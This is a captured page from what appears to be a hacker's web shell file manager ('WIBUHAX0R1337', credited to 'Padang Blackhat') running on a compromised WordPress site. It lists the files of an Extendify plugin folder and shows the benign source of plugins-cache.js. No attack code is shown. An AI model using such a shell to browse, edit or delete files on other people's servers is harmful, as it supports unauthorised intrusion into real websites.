-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
extendify
/
src
/
PageCreator
/
state
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
cache.js
0.378KB
Edit File
Delete File
Rename
pages.js
1.522KB
Edit File
Delete File
Rename
plugins-cache.js
0.65KB
Edit File
Delete File
Rename
user.js
0.922KB
Edit File
Delete File
Rename
import apiFetch from '@wordpress/api-fetch'; import { create } from 'zustand'; import { persist } from 'zustand/middleware'; export const useInstalledPluginsCache = create( persist( (set) => ({ installedPlugins: window.extSharedData?.activePlugins?.map( (plugin) => plugin.split('/')[0], ), updateInstalledPlugins: async () => { const installedPlugins = ( await apiFetch({ path: '/wp/v2/plugins', method: 'GET', }) )?.map((plugin) => plugin.plugin.split('/')[0]); set({ installedPlugins }); }, }), { name: `extendify-page-creator-page-installed-plugins-cache-${window.extSharedData.siteId}`, }, ), );
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat